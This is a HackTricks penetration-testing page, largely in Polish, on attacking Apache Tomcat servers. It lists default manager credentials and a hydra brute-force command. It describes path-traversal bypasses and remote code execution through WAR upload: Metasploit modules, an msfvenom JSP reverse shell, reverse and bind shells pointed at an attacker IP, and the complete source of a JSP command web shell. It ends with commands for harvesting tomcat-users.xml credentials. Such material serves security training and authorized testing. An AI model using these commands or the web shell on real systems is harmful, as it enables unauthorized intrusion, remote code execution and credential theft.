Tomcat

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Try Hard Security Group

Join the Try Hard Security Discord Server!Discord

Odkrycie

Zwykle działa na porcie 8080
Typowy błąd Tomcat:

Enumeracja

Identyfikacja wersji

Aby znaleźć wersję Apache Tomcat, można wykonać prostą komendę:

curl -s http://tomcat-site.local:8080/docs/ | grep Tomcat

To będzie wyszukiwać termin "Tomcat" na stronie indeksu dokumentacji, ujawniając wersję w tagu tytułu odpowiedzi HTML.

Lokalizacja plików menedżera

Identyfikacja dokładnych lokalizacji katalogów /manager i /host-manager jest kluczowa, ponieważ ich nazwy mogą być zmienione. Zaleca się przeprowadzenie ataku brute-force w celu zlokalizowania tych stron.

Enumeracja nazw użytkowników

Dla wersji Tomcat starszych niż 6, możliwe jest enumerowanie nazw użytkowników poprzez:

msf> use auxiliary/scanner/http/tomcat_enum

Domyślne Poświadczenia

Katalog /manager/html jest szczególnie wrażliwy, ponieważ umożliwia przesyłanie i wdrażanie plików WAR, co może prowadzić do wykonania kodu. Katalog ten jest chroniony podstawową autoryzacją HTTP, a powszechne poświadczenia to:

admin:admin
tomcat:tomcat
admin:
admin:s3cr3t
tomcat:s3cr3t
admin:tomcat

Te poświadczenia można przetestować za pomocą:

msf> use auxiliary/scanner/http/tomcat_mgr_login

Innym godnym uwagi katalogiem jest /manager/status, który wyświetla wersję Tomcat i systemu operacyjnego, co pomaga w identyfikacji luk w zabezpieczeniach.

Atak Brute Force

Aby spróbować przeprowadzić atak brute force na katalogu menedżera, można użyć:

hydra -L users.txt -P /usr/share/seclists/Passwords/darkweb2017-top1000.txt -f 10.10.10.64 http-get /manager/html

Along with setting various parameters in Metasploit to target a specific host.

Common Vulnerabilities

Password Backtrace Disclosure

Dostęp do /auth.jsp może ujawnić hasło w backtrace w sprzyjających okolicznościach.

Double URL Encoding

Wrażliwość CVE-2007-1860 w mod_jk pozwala na podwójne kodowanie URL w celu przejścia przez ścieżkę, umożliwiając nieautoryzowany dostęp do interfejsu zarządzania za pomocą specjalnie przygotowanego URL.

Aby uzyskać dostęp do interfejsu zarządzania Tomcat, przejdź do: pathTomcat/%252E%252E/manager/html

/examples

Wersje Apache Tomcat od 4.x do 7.x zawierają przykładowe skrypty, które są podatne na ujawnienie informacji i ataki typu cross-site scripting (XSS). Te skrypty, wymienione w sposób kompleksowy, powinny być sprawdzone pod kątem nieautoryzowanego dostępu i potencjalnej eksploatacji. Znajdź więcej informacji tutaj

/examples/jsp/num/numguess.jsp
/examples/jsp/dates/date.jsp
/examples/jsp/snp/snoop.jsp
/examples/jsp/error/error.html
/examples/jsp/sessions/carts.html
/examples/jsp/checkbox/check.html
/examples/jsp/colors/colors.html
/examples/jsp/cal/login.html
/examples/jsp/include/include.jsp
/examples/jsp/forward/forward.jsp
/examples/jsp/plugin/plugin.jsp
/examples/jsp/jsptoserv/jsptoservlet.jsp
/examples/jsp/simpletag/foo.jsp
/examples/jsp/mail/sendmail.jsp
/examples/servlet/HelloWorldExample
/examples/servlet/RequestInfoExample
/examples/servlet/RequestHeaderExample
/examples/servlet/RequestParamExample
/examples/servlet/CookieExample
/examples/servlet/JndiServlet
/examples/servlet/SessionExample
/tomcat-docs/appdev/sample/web/hello.jsp

Path Traversal Exploit

W niektórych podatnych konfiguracjach Tomcat możesz uzyskać dostęp do chronionych katalogów w Tomcat, używając ścieżki: /..;/

Na przykład, możesz być w stanie uzyskać dostęp do strony menedżera Tomcat poprzez dostęp do: www.vulnerable.com/lalala/..;/manager/html

Inny sposób na obejście chronionych ścieżek za pomocą tego triku to dostęp do http://www.vulnerable.com/;param=value/manager/html

RCE

Na koniec, jeśli masz dostęp do Menedżera Aplikacji Webowych Tomcat, możesz przesłać i wdrożyć plik .war (wykonać kod).

Limitations

Będziesz mógł wdrożyć WAR tylko wtedy, gdy masz wystarczające uprawnienia (role: admin, manager i manager-script). Te szczegóły można znaleźć w tomcat-users.xml, zazwyczaj zdefiniowane w /usr/share/tomcat9/etc/tomcat-users.xml (to różni się w zależności od wersji) (zobacz sekcję POST).

# tomcat6-admin (debian) or tomcat6-admin-webapps (rhel) has to be installed

# deploy under "path" context path
curl --upload-file monshell.war -u 'tomcat:password' "http://localhost:8080/manager/text/deploy?path=/monshell"

# undeploy
curl "http://tomcat:Password@localhost:8080/manager/text/undeploy?path=/monshell"

Metasploit

use exploit/multi/http/tomcat_mgr_upload
msf exploit(multi/http/tomcat_mgr_upload) > set rhost <IP>
msf exploit(multi/http/tomcat_mgr_upload) > set rport <port>
msf exploit(multi/http/tomcat_mgr_upload) > set httpusername <username>
msf exploit(multi/http/tomcat_mgr_upload) > set httppassword <password>
msf exploit(multi/http/tomcat_mgr_upload) > exploit

MSFVenom Reverse Shell

Stwórz plik war do wdrożenia:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<LHOST_IP> LPORT=<LHOST_IP> -f war -o revshell.war

Prześlij plik revshell.war i uzyskaj do niego dostęp (/revshell/):

Bind i reverse shell z tomcatWarDeployer.py

W niektórych scenariuszach to nie działa (na przykład w starych wersjach sun)

Pobierz

git clone https://github.com/mgeeky/tomcatWarDeployer.git

Odwrócona powłoka

./tomcatWarDeployer.py -U <username> -P <password> -H <ATTACKER_IP> -p <ATTACKER_PORT> <VICTIM_IP>:<VICTIM_PORT>/manager/html/

Bind shell

./tomcatWarDeployer.py -U <username> -P <password> -p <bind_port> <victim_IP>:<victim_PORT>/manager/html/

Używanie Culsterd

clusterd.py -i 192.168.1.105 -a tomcat -v 5.5 --gen-payload 192.168.1.6:4444 --deploy shell.war --invoke --rand-payload -o windows

Ręczna metoda - Web shell

Utwórz index.jsp z tym kontentem:

<FORM METHOD=GET ACTION='index.jsp'>
<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
String output = "";
if(cmd != null) {
String s = null;
try {
Process p = Runtime.getRuntime().exec(cmd,null,null);
BufferedReader sI = new BufferedReader(new
InputStreamReader(p.getInputStream()));
while((s = sI.readLine()) != null) { output += s+"</br>"; }
}  catch(IOException e) {   e.printStackTrace();   }
}
%>
<pre><%=output %></pre>

mkdir webshell
cp index.jsp webshell
cd webshell
jar -cvf ../webshell.war *
webshell.war is created
# Upload it

Możesz również zainstalować to (umożliwia przesyłanie, pobieranie i wykonywanie poleceń): http://vonloesch.de/filebrowser.html

Ręczna metoda 2

Pobierz powłokę JSP, taką jak ta i utwórz plik WAR:

wget https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp
zip -r backup.war cmd.jsp
# When this file is uploaded to the manager GUI, the /backup application will be added to the table.
# Go to: http://tomcat-site.local:8180/backup/cmd.jsp

POST

Nazwa pliku z danymi uwierzytelniającymi Tomcat to tomcat-users.xml

find / -name tomcat-users.xml 2>/dev/null

Inne sposoby na zebranie poświadczeń Tomcat:

msf> use post/multi/gather/tomcat_gather
msf> use post/windows/gather/enum_tomcat

Inne narzędzia skanowania tomcat

https://github.com/p0dalirius/ApacheTomcatScanner

Odniesienia

Try Hard Security Group

Join the Try Hard Security Discord Server!Discord

Ucz się i ćwicz Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE) Ucz się i ćwicz Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)

Wsparcie dla HackTricks

Sprawdź plany subskrypcyjne!
Dołącz do 💬 grupy Discord lub grupy telegram lub śledź nas na Twitterze 🐦 @hacktricks_live.
Podziel się sztuczkami hackingowymi, przesyłając PR-y do HackTricks i HackTricks Cloud repozytoriów github.

PreviousSymfony NextBasic Tomcat Info

Last updated 8 days ago